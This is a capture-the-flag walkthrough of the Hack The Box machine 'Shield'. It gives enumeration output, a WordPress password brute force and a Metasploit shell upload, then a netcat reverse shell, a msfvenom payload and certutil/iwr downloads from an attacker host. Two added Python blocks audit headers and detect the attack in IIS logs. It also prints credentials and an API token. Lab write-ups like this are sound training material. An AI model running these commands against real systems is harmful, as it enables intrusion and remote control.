Shield
HTB - Shield
nmap -T4 -A -p- 10.10.10.29
kali@kali:~$ nmap -T4 -A -p- 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 17:10 EDT
Nmap scan report for 10.10.10.29
Host is up (0.47s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 643.75 seconds
Nessus scan for fun. Start it with
sudo /etc/init.d/nessusd start
and go to https://kali:8834
Enumerate HTTP
Ran
sudo nikto -h http://10.10.10.29
kali@kali:~$ sudo nikto -h http://10.10.10.29
[sudo] password for kali:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.29
+ Target Hostname:    10.10.10.29
+ Target Port:        80
+ Start Time:         2020-05-04 17:16:16 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-05-04 18:12:15 (GMT-4) (3359 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

kali@kali:~$ sudo nikto -h http://10.10.10.29/wordpress
[sudo] password for kali:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.29
+ Target Hostname:    10.10.10.29
+ Target Port:        80
+ Start Time:         2020-05-04 18:41:32 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/7.1.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with multiple values: (<http://10.10.10.29/wordpress/index.php/wp-json/>; rel="https://api.w.org/",<http://10.10.10.29/wordpress/>; rel=shortlink,)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 3 error(s) and 8 item(s) reported on remote host
+ End Time:           2020-05-04 19:11:11 (GMT-4) (1779 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
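The nikto findings above (missing X-Frame-Options / X-Content-Type-Options / X-XSS-Protection, TRACE in the allowed methods, PHP version leaked via X-Powered-By) are easy to turn into a repeatable check for the fix. This is an added Python example, not code from the original writeup; the header sets are constructed to mirror what nikto reported, not captured from the box, and audit_url is only a convenience wrapper that sends a single OPTIONS request to a host you own.

```python
"""Audit HTTP response headers and the advertised method list for the
weaknesses nikto reported on the IIS root and on /wordpress/.
Sample header sets below are constructed for illustration."""
from http.client import HTTPConnection
from urllib.parse import urlparse

# Header -> why it matters / what to set
REQUIRED_HEADERS = {
    "x-frame-options": "clickjacking; set DENY or SAMEORIGIN",
    "x-content-type-options": "MIME sniffing; set nosniff",
    "x-xss-protection": "legacy XSS filter hint; prefer a Content-Security-Policy",
}
# Cross-site tracing methods; on IIS restrict them with <verbs> in web.config
RISKY_METHODS = {"TRACE", "TRACK"}
# Headers that only disclose the software stack to a scanner
DISCLOSURE_HEADERS = ("x-powered-by",)


def audit_headers(headers):
    """headers: mapping of header name -> value (any case).
    Returns a list of human-readable findings; empty list means clean."""
    lower = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, why in REQUIRED_HEADERS.items():
        if name not in lower:
            findings.append(f"missing {name} ({why})")
    # nikto reports both 'Allowed' (Allow header) and 'Public' methods
    advertised = lower.get("allow", "") or lower.get("public", "")
    methods = {m.strip().upper() for m in advertised.split(",") if m.strip()}
    for m in sorted(methods & RISKY_METHODS):
        findings.append(f"{m} method enabled (cross-site tracing; restrict verbs)")
    for name in DISCLOSURE_HEADERS:
        if lower.get(name):
            findings.append(f"{name} discloses {lower[name]} (remove header)")
    return findings


def audit_url(url, timeout=10):
    """Send one OPTIONS request to a live host you are authorised to test
    and audit the response headers. Not used by the offline sample below."""
    p = urlparse(url)
    conn = HTTPConnection(p.hostname, p.port or 80, timeout=timeout)
    conn.request("OPTIONS", p.path or "/")
    resp = conn.getresponse()
    return audit_headers(dict(resp.getheaders()))


# Constructed header sets modelled on the two nikto runs (not real captures).
IIS_ROOT = {
    "Server": "Microsoft-IIS/10.0",
    "Allow": "OPTIONS, TRACE, GET, HEAD, POST",
    "Content-Type": "text/html",
}
WP_DIR = {
    "X-Powered-By": "PHP/7.1.29",
    "Allow": "OPTIONS, TRACE, GET, HEAD, POST",
    "X-Redirect-By": "WordPress",
}
# What the same responses should look like after hardening.
HARDENED = {
    "Server": "Microsoft-IIS/10.0",
    "Allow": "GET, HEAD, POST",
    "X-Frame-Options": "SAMEORIGIN",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "1; mode=block",
}

if __name__ == "__main__":
    for label, hdrs in (("IIS root", IIS_ROOT), ("/wordpress/", WP_DIR), ("hardened", HARDENED)):
        print(label, audit_headers(hdrs) or "clean")
```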
Subdirectory brute force with gobuster:
gobuster dir -u http://10.10.10.29/ -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
(other possible wordlist: /usr/share/wordlists/dirb/common.txt)
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.29/
[+] Threads:        200
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/04 17:27:45 Starting gobuster
===============================================================
/wordpress (Status: 301)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/people: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/aboutus: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/new: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/sports: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/buttons: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/image: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/blogs: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/products: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/events: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:27:56 [!] Get http://10.10.10.29/music: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/474: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:12 [!] Get http://10.10.10.29/Top: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:13 [!] net/http: request canceled (Client.Timeout exceeded while reading body)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/Logos: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/infobox: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/994: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:15 [!] Get http://10.10.10.29/777: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/04 17:28:16 [!] Get http://10.10.10.29/su: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/WordPress (Status: 301)
[ERROR] 2020/05/04 17:30:21 [!] Get http://10.10.10.29/category3: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/Wordpress (Status: 301)
===============================================================
2020/05/04 17:34:53 Finished
===============================================================
WordPress install found at /wordpress/
Run wpscan:
wpscan --update
wpscan --url 10.10.10.29/wordpress/ --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3g
Output:
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.10.29/wordpress/ [10.10.10.29]
[+] Started: Mon May  4 17:38:24 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Microsoft-IIS/10.0
 |  - X-Powered-By: PHP/7.1.29
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.29/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://10.10.10.29/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.29/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.10.29/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |  - http://10.10.10.29/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |
 | [!] 18 vulnerabilities identified:
 |
 | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
 |     Fixed in: 5.2.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9867
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
 |      - https://hackerone.com/reports/339483
 |
 | [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
 |     Fixed in: 5.2.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9864
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
 |      - https://fortiguard.com/zeroday/FG-VD-18-165
 |      - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9908
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9909
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
 |     Fixed in: 5.2.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9973
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9975
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://hackerone.com/reports/509930
 |      - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9976
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
 |
 | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
 |     Fixed in: 5.2.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10004
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
 |
 | [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10201
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47634/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw
 |
 | [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10202
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47635/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10203
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47633/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Search Block
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10204
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11030
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47636/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-vccm-6gmc-qhjh
 |
 | [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10205
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47637/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads
 |     Fixed in: 5.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10206
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47638/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mesmerize-companion
 | Location: http://10.10.10.29/wordpress/wp-content/plugins/mesmerize-companion/
 | Latest Version: 1.6.111
 | Last Updated: 2020-04-10T15:01:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | The version could not be determined.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:04 <==============================================================================> (21 / 21) 100.00% Time: 00:00:04

[i] No Config Backups Found.

[+] WPVulnDB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 48

[+] Finished: Mon May  4 17:38:40 2020
[+] Requests Done: 27
[+] Cached Requests: 36
[+] Data Sent: 6.36 KB
[+] Data Received: 18.56 KB
[+] Memory used: 175.391 MB
[+] Elapsed time: 00:00:15
Enumerate Users:
wpscan --url 10.10.10.29/wordpress/ --enumerate u
[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:30 <=============================================================================> (10 / 10) 100.00% Time: 00:00:30

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
Bruteforce login:
wpscan --url 10.10.10.29/wordpress/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin --max-threads 50 --api-token 4emjktvbV4Csl9u9IVTpH5uWcnXvgwJZfWSCSlu0s3g
Login found to be admin:P@s5w0rd! from the last box. Go to http://10.10.10.29/wordpress/wp-login.php and log in.
Searching for "metasploit wordpress" yields https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload
Exploit
sudo msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf > set PASSWORD P@s5w0rd!
msf > set USERNAME admin
msf > set TARGETURI /wordpress
msf > set RHOSTS 10.10.10.29
msf > set LPORT 443
msf > set payload php/meterpreter_reverse_tcp
msf > exploit
Upgrade to more stable shell:
wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip
unzip netcat-win32-1.12.zip
msf > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
sudo python3 -m http.server 80
msf > shell
> iwr -outf nc.exe http://10.10.14.173/nc.exe
nc -lvp 1234
msf > execute -f nc.exe -a "-e cmd.exe 10.10.14.173 1234"
2nd way to upgrade (much better):
Change the payload to download and execute:
set payload php/download_exec
msf > set url http://10.10.14.173/shell.exe
Create exploit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.173 LPORT=443 -f exe > shell.exe
Run server:
sudo python3 -m http.server 80
Open up port to listen on:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
options
set LHOST 10.10.15.117
set LPORT 443
run
Sysinfo:
sysinfo
Computer    : SHIELD
OS          : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
Meterpreter : php/windows
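Everything from the wpscan password attack to the wp_admin_shell_upload foothold goes through IIS, so it is all visible in the IIS W3C logs. The following is an added Python example (not part of the original writeup) that flags those stages over constructed log lines: a burst of login POSTs from one client, a plugin upload through wp-admin/update.php, and the uploader's first request to a plugin directory that was never seen before. The log lines, plugin directory names and thresholds are made up for illustration, and the upload endpoint used by the module is my assumption, not taken from the page.

```python
"""Flag the WordPress attack chain from this box in IIS W3C logs.
Sample log is constructed; field order is the IIS 10 default layout."""
from collections import defaultdict
from datetime import datetime, timedelta

FIELDS = ("date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username "
          "c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status "
          "time-taken").split()

LOGIN_THRESHOLD = 10                 # login POSTs from one client ...
LOGIN_WINDOW = timedelta(seconds=60)  # ... within this window -> password attack
LOGIN_ENDPOINTS = ("/wp-login.php", "/xmlrpc.php")


def parse_w3c(lines):
    """Yield one dict per data row; '#' directives are handled or skipped."""
    fields = FIELDS
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # honour the file's own field order
            continue
        if line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue                    # malformed row; skip rather than guess
        yield dict(zip(fields, parts))


def detect(lines):
    """Return a list of (client_ip, rule, detail) alerts, in log order."""
    alerts = []
    login_times = defaultdict(list)   # client ip -> recent login POST timestamps
    known_plugins = set()             # plugin dirs seen so far in the log
    uploaders = set()                 # clients that pushed a plugin zip
    flagged = set()
    for rec in parse_w3c(lines):
        ip, method = rec["c-ip"], rec["cs-method"]
        stem = rec["cs-uri-stem"].lower()
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        # Rule 1: password attack against wp-login.php / xmlrpc.php
        if method == "POST" and stem.endswith(LOGIN_ENDPOINTS):
            recent = [t for t in login_times[ip] if ts - t <= LOGIN_WINDOW] + [ts]
            login_times[ip] = recent
            if len(recent) >= LOGIN_THRESHOLD and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "login-bruteforce",
                               f"{len(recent)} login POSTs within {LOGIN_WINDOW.seconds}s"))
        # Rule 2: plugin zip upload through the admin UI (assumed module path)
        if (method == "POST" and stem.endswith("/wp-admin/update.php")
                and "action=upload-plugin" in rec["cs-uri-query"]):
            uploaders.add(ip)
            alerts.append((ip, "plugin-upload",
                           f"POST {rec['cs-uri-stem']}?{rec['cs-uri-query']} -> {rec['sc-status']}"))
        # Rule 3: uploader requests a plugin directory nobody requested before
        if "/wp-content/plugins/" in stem:
            plugin = stem.split("/wp-content/plugins/", 1)[1].split("/", 1)[0]
            if ip in uploaders and plugin not in known_plugins:
                alerts.append((ip, "new-plugin-access",
                               f"{method} {rec['cs-uri-stem']} -> {rec['sc-status']}"))
            known_plugins.add(plugin)
    return alerts


# Constructed sample: one benign asset fetch, a 12-request login burst,
# a plugin upload and the follow-up hit on the new plugin directory.
SAMPLE_LOG = (
    "#Software: Microsoft Internet Information Services 10.0\n"
    "#Fields: " + " ".join(FIELDS) + "\n"
    "2020-05-04 21:40:01 10.10.10.29 GET /wordpress/wp-content/plugins/mesmerize-companion/assets/css/style.css - 80 - 10.10.14.9 Mozilla/5.0 - 200 0 0 15\n"
    + "".join(
        f"2020-05-04 21:40:{s:02d} 10.10.10.29 POST /wordpress/wp-login.php - 80 - 10.10.14.173 WPScan/3.8.1 - 200 0 0 120\n"
        for s in range(2, 14))
    + "2020-05-04 21:45:30 10.10.10.29 POST /wordpress/wp-admin/update.php action=upload-plugin 80 - 10.10.14.173 Mozilla/5.0 - 200 0 0 340\n"
    "2020-05-04 21:45:31 10.10.10.29 GET /wordpress/wp-content/plugins/jBpKzYoQ/eMtRqlUw.php - 80 - 10.10.14.173 Mozilla/5.0 - 200 0 0 55\n"
)

if __name__ == "__main__":
    for ip, rule, detail in detect(SAMPLE_LOG.splitlines()):
        print(f"{ip:15} {rule:20} {detail}")
```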
Privilege Escalation (Great Tutorial for Windows)
Find exploit:
Method 1: Priv esc suggester
search suggester
use 0
options
set session 1
run
Result:
[*] 10.10.10.29 - Collecting local exploits for x86/windows...
[*] 10.10.10.29 - 30 exploit checks are being tried...
[+] 10.10.10.29 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.29 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
Result: I tried ms16_032_secondary_logon_handle_privesc with an x64 meterpreter after changing to an x64 shell from 32 bit, but it did not work.
Method 2: Searching for "windows server 2016 privilege escalation exploit" yields https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#juicy-potato-abusing-the-golden-privileges which points to ohpe/juicy-potato.
Method 3: More automated searchers.
sherlock by rastamouse
sudo python3 -m http.server 80
msf shell > certutil -urlcache -f http://10.10.15.117/sher.ps1 sher.ps1
msf shell > powershell.exe -exec bypass -Command "& {Import-Module .\sher.ps1; Find-AllVulns}"
Output:
